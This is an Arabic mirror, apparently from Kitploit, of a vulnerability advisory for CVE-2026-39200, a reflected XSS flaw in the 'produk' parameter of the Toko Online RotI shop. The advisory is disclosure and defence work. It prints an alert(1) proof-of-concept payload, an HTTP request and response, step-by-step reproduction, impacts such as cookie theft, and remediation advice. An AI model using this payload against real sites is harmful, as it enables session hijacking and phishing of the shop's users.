Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39200 — يتم نسخ قيمة معامل الطلب `produk` إلى قيمة سمة لوسم HTML تكون محاطة بعلامات اقتباس مزدوجة. تم إرسال الحمولة `xbnw0"><script>alert(1)</script>skc2h` في معامل `produk`. وتمت إعادة عرض هذا الإدخال على الشكل `xbnw0\"><script>alert(1)</script>skc2h` في استجابة التطبيق. | Kitploit
أدوات/GitHubGitHub/r00tali/cve-2026-39200
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubr00tali/cve-2026-39200

CVE-2026-39200

يتم نسخ قيمة معامل الطلب `produk` إلى قيمة سمة لوسم HTML تكون محاطة بعلامات اقتباس مزدوجة. تم إرسال الحمولة `xbnw0"><script>alert(1)</script>skc2h` في معامل `produk`. وتمت إعادة عرض هذا الإدخال على الشكل `xbnw0\"><script>alert(1)</script>skc2h` في استجابة التطبيق.

عرض المستودع
13منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-39200 — البرمجة النصية عبر المواقع (XSS) الانعكاسية في Toko Online RotI

الملخص

تم تحديد ثغرة برمجة نصية عبر المواقع (XSS) انعكاسية في معامل الطلب produk في تطبيق الويب Toko Online RotI. يفشل التطبيق في ترميز HTML للمدخلات المقدمة من المستخدم قبل انعكاسها داخل سمة وسم HTML محاطة بعلامتي اقتباس مزدوجتين. يمكن للمهاجم إنشاء عنوان URL خبيث، وعندما يزوره ضحية، يتم تنفيذ JavaScript عشوائي في سياق جلسة متصفح الضحية.

الحقلالقيمة
معرف CVECVE-2026-39200
نوع الثغرةCWE-79 — تحييد غير صحيح للمدخلات أثناء إنشاء صفحة الويب (XSS انعكاسية)
المنتج المتأثرToko Online RotI (متجر إندونيسي عبر الإنترنت)
المعامل المتأثرproduk
المكتشفUzair Ali (r00tali) — مختبِر اختراق / صياد ثغرات أمنية
تاريخ الاكتشاف2026-07-03
تاريخ تخصيص CVE2026-07-12
تاريخ نشر الاستشارة2026-07-19

تفاصيل الثغرة

يتم نسخ معامل الطلب produk حرفيًا إلى قيمة سمة وسم HTML محاطة بعلامتي اقتباس مزدوجتين. نظرًا لأن التطبيق لا يقوم بترميز HTML للمدخلات المقدمة من المستخدم قبل انعكاسها، يمكن للمهاجم الخروج من السمة عن طريق إرسال حمولة تحتوي على علامة اقتباس مزدوجة إغلاق متبوعة بحمولة HTML/JavaScript.

حمولة إثبات المفهوم

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

عند إرسال هذه الحمولة كمعامل produk، يعيد التطبيق إرجاع المدخلات في الاستجابة دون ترميز. تُنهي "> الإغلاقية السمة الأصلية، ويتم تفسير كتلة <script>alert(1)</script> المحقونة من قبل المتصفح كعنصر HTML جديد، مما ينفذ JavaScript عشوائيًا في جلسة المستخدم.

النمط القابل للاستغلال (توضيحي)

تبدو استجابة HTML القابلة للاستغلال كما يلي:

root@kitploit:~
<!-- BEFORE injection -->
<input type="text" name="produk" value="USER_INPUT" />

<!-- AFTER injection with payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            Browser executes this

طلب HTTP (إعادة الإنتاج)

root@kitploit:~
GET /[vulnerable-endpoint]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [target-host]
User-Agent: Mozilla/5.0

استجابة HTTP (مقتطف)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

خطوات إعادة الإنتاج

  1. حدد نقطة نهاية في تطبيق Toko Online RotI تعكس معامل produk داخل سمة HTML (مثل صفحة بحث المنتجات أو التفاصيل أو الفلترة).
  2. استبدل قيمة معامل produk بالحمولة التالية:
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. أرسل الطلب إلى الخادم.
  4. افحص استجابة الخادم. يتم إرجاع الحمولة دون تعديل داخل السمة، مما يؤدي إلى الخروج من " وإنشاء عنصر <script> صالح في DOM.
  5. حمّل الاستجابة المصممة في أي متصفح حديث. تظهر نافذة تنبيه JavaScript alert(1)، مما يؤكد تنفيذ JavaScript عشوائي في جلسة الضحية.

الأثر

يسمح الاستغلال الناجح لهذه الثغرة الانعكاسية XSS للمهاجم بـ:

  • سرقة ملفات تعريف الارتباط للجلسة ورموز المصادقة، مما يؤدي إلى الاستيلاء على الحساب.
  • تنفيذ إجراءات نيابة عن المستخدمين المصادق عليهم دون علمهم.
  • إعادة توجيه المستخدمين إلى مواقع خبيثة (تصيد / جمع بيانات الاعتماد).
  • حقن محتوى خبيث في التطبيق (تشويه الصفحات).
  • التقاط ضغطات المفاتيح وبيانات النماذج المقدمة من الضحية.
  • استغلال ثغرات المتصفح لتسليم برمجيات خبيثة عبر الزيارات العابرة (drive-by).
  • إساءة استخدام علاقة الثقة بين المستخدم ونطاق التطبيق.

نظرًا لأن الثغرة انعكاسية، فإن الاستغلال يتطلب فقط قيام الضحية بالنقر على رابط مصمم، مما يجعل من السهل تسليحها في حملات التصيد.

CVSS v3.1 (تقديري): 6.1 (متوسطة) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


المعالجة

لمعالجة هذه الثغرة، يجب على المورّد:

  1. ترميز HTML لجميع القيم المقدمة من المستخدم قبل انعكاسها في مخرجات HTML. وتحديدًا تشفير <, >, ", ' و & (مثل &lt;, &gt;, &quot;, &#x27;, &amp;).
  2. استخدام أدوات ترميز المخرجات المدمجة في الإطار البرمجي بدلاً من الربط اليدوي. أمثلة:
    • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET: HttpUtility.HtmlEncode(input) أو صيغة <%: %>
    • Python (Jinja2): {{ input }} (يتم الترميز تلقائيًا افتراضيًا)
  3. تعيين ترويسة استجابة Content-Security-Policy (CSP) صارمة للحد من تأثير أي حقن متبقٍ:
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  4. تعيين علامتي HttpOnly و Secure على جميع ملفات تعريف الارتباط للجلسة لمنع JavaScript من قراءتها.
  5. التحقق من معامل produk مقابل قائمة السماح (allow-list) لمعرّفات المنتجات المتوقعة (أرقام تعريفية، slugs، إلخ) ورفض أي شيء لا يطابقها.
  6. إضافة X-Content-Type-Options: nosniff لمنع فحص نوع MIME لأجسام الاستجابة.

الجدول الزمني للإفصاح

التاريخالحدث
2026-07-03تم اكتشاف الثغرة أثناء اختبار أمني مصرح به
2026-07-03تم طلب معرف CVE من MITRE عبر cveform.mitre.org
2026-07-12تم تخصيص CVE-2026-39200 من قبل فريق التخصيص في MITRE
2026-07-19تم نشر الاستشارة علنًا

المكتشف

** Uzair Ali (r00tali)** — مختبِر اختراق / صياد ثغرات أمنية / باحث أمني

  • GitHub: https://github.com/r00tali

المراجع

  • OWASP — البرمجة النصية عبر المواقع (XSS)
  • CWE-79: تحييد غير صحيح للمدخلات أثناء إنشاء صفحة الويب
  • PortSwigger — XSS الانعكاسية
  • سجل CVE في MITRE — CVE-2026-39200

إخلاء مسؤولية

تم نشر هذه الاستشارة لأغراض تعليمية ودفاعية فقط. تم الإبلاغ عن الثغرة من خلال عملية الإفصاح المسؤول عبر فريق تخصيص CVE في MITRE. لا يتم الكشف عن أي معلومات سرية للمورّد أو بيانات عملاء أو كود مملوك. يستخدم إثبات المفهوم حمولة alert(1) غير ضارة ويهدف إلى إظهار وجود الخلل، وليس تسهيل الهجمات على الخدمة الحية.

تنزيل الأداة